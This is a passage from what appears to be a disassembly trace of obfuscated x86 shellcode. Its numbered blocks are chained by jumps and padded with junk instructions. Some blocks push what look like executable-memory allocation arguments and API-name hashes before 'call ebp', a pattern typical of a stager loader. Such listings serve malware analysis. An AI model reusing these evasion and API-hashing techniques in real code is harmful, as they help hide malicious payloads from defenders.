173 :  0x9b0 jmp 0x222
###############################
174 :  0x9b5 popf 
174 :  0x9b7 das 
174 :  0x9b8 add byte ptr [ecx], dh
174 :  0x9ba add byte ptr [eax], cl
174 :  0x9bd jmp 0x1b3
###############################
175 :  0x9c2 pushf 
175 :  0x9c4 rcl bp, 0
175 :  0x9c8 popf 
175 :  0x9ca push edx
175 :  0x9cb jmp 0xa6d
###############################
176 :  0x9d0 push ebx
176 :  0x9d1 push ebx
176 :  0x9d2 mov edi, esp
176 :  0x9d4 push edi
176 :  0x9d5 jmp 0x155
###############################
177 :  0x9da nop 
177 :  0x9db pushf 
177 :  0x9dd rcl ecx, 0
177 :  0x9e0 popf 
177 :  0x9e2 jmp 0xaa2
###############################
178 :  0x9e7 jae 0x9e9
178 :  0x9e9 sub eax, 0x53004d00
178 :  0x9ee add byte ptr [eax], bl
178 :  0x9f1 pushf 
178 :  0x9f3 jmp 0x5ce
###############################
179 :  0x9f8 add byte ptr [ebp], dl
179 :  0x9fb push esi
179 :  0x9fc add byte ptr [edx], bl
179 :  0x9ff jp 0x206
179 :  0xa05 jmp 0x206
###############################
180 :  0xa0a mov cl, cl
180 :  0xa0c popf 
180 :  0xa0e pushf 
180 :  0xa10 and edi, edi
180 :  0xa12 jmp 0x8d7
###############################
181 :  0xa17 pop eax
181 :  0xa18 pop edi
181 :  0xa19 pop edx
181 :  0xa1a mov edx, dword ptr [edx]
181 :  0xa1c jmp 0x670
###############################
182 :  0xa21 add byte ptr [esi], dl
182 :  0xa24 jb 0xa26
182 :  0xa26 imul eax, dword ptr [eax], 0x47
182 :  0xa29 pushf 
182 :  0xa2b jmp 0x86b
###############################
183 :  0xa30 add byte ptr [ebx + 0x68502ac7], al
183 :  0xa36 add esi, 1
183 :  0xa39 wait 
183 :  0xa3a push ds
183 :  0xa3b jmp 0xf3
###############################
184 :  0xa40 popf 
184 :  0xa42 nop 
184 :  0xa43 jns 0x49d
184 :  0xa49 pushf 
184 :  0xa4b jmp 0x498
###############################
185 :  0xa50 pushf 
185 :  0xa52 shl ax, 0
185 :  0xa56 popf 
185 :  0xa58 push ebx
185 :  0xa59 jmp 0x96c
###############################
186 :  0xa5e jbe 0xa60
186 :  0xa60 inc edi
186 :  0xa61 add byte ptr [esi], dh
186 :  0xa64 add byte ptr [esi], ch
186 :  0xa68 jmp 0x843
###############################
187 :  0xa6d lea eax, [esp + 0x40]
187 :  0xa71 push dword ptr [eax]
187 :  0xa73 push 0x49eaddda
187 :  0xa78 call ebp
187 :  0xa7a jmp 0x376
###############################
188 :  0xa7f popf 
188 :  0xa81 add byte ptr [ebx], ch
188 :  0xa84 dec ebp
188 :  0xa85 add byte ptr [edi], al
188 :  0xa88 jmp 0x461
###############################
189 :  0xa8d pop edi
189 :  0xa8e pushf 
189 :  0xa90 lea di, [di]
189 :  0xa94 popf 
189 :  0xa96 jmp 0x253
###############################
190 :  0xa9b popal 
190 :  0xa9c pushf 
190 :  0xa9e dec edx
190 :  0xa9f inc edx
190 :  0xaa0 jmp 0xa7f
###############################
191 :  0xaa2 push edi
191 :  0xaa3 mov edi, eax
191 :  0xaa5 push edi
191 :  0xaa6 push 0x600ba721
191 :  0xaab jmp 0x2dd
###############################
192 :  0xab0 add byte ptr fs:[eax], dl
192 :  0xab4 pushf 
192 :  0xab6 add eax, 0
192 :  0xab9 popf 
192 :  0xabb jmp 0x91f
###############################
193 :  0xac0 push 0x40
193 :  0xac2 push 0x1000
193 :  0xac7 push 0x400000
193 :  0xacc pushf 
193 :  0xace jmp 0x3a4
###############################
194 :  0xad3 sub edx, 1
194 :  0xad6 add byte ptr [ecx], al
194 :  0xad9 pop ecx
194 :  0xada add byte ptr [eax], bl
194 :  0xadd jmp 0xa5e
###############################
195 :  0xae2 pushf 
195 :  0xae4 rcr eax, 0
195 :  0xae7 popf 
195 :  0xae9 sub eax, 1
195 :  0xaec jmp 0x7ad
###############################
196 :  0xaf1 outsb dx, byte ptr [esi]
196 :  0xaf2 add byte ptr [ebp], ah
196 :  0xaf5 xor byte ptr [eax], al
196 :  0xaf7 pushf 
196 :  0xaf9 jmp 0x47
###############################
197 :  0xafe pushf 
197 :  0xb00 rcl bl, 0
197 :  0xb03 popf 
197 :  0xb05 add byte ptr [ecx], dh
197 :  0xb07 jmp 0x12a
###############################
198 :  0xb0c pushf 
198 :  0xb0e sub bl, 0
198 :  0xb11 popf 
198 :  0xb13 jae 0x751
198 :  0xb19 jmp 0x751
###############################
199 :  0xb1e sub ecx, 1
199 :  0xb21 jne 0x85f
199 :  0xb27 push edx
199 :  0xb28 push edi
199 :  0xb29 jmp 0x4db
###############################
200 :  0xb2e xor cx, 0
200 :  0xb32 popf 
200 :  0xb34 push ebx
200 :  0xb35 pushf 
200 :  0xb37 jmp 0x10
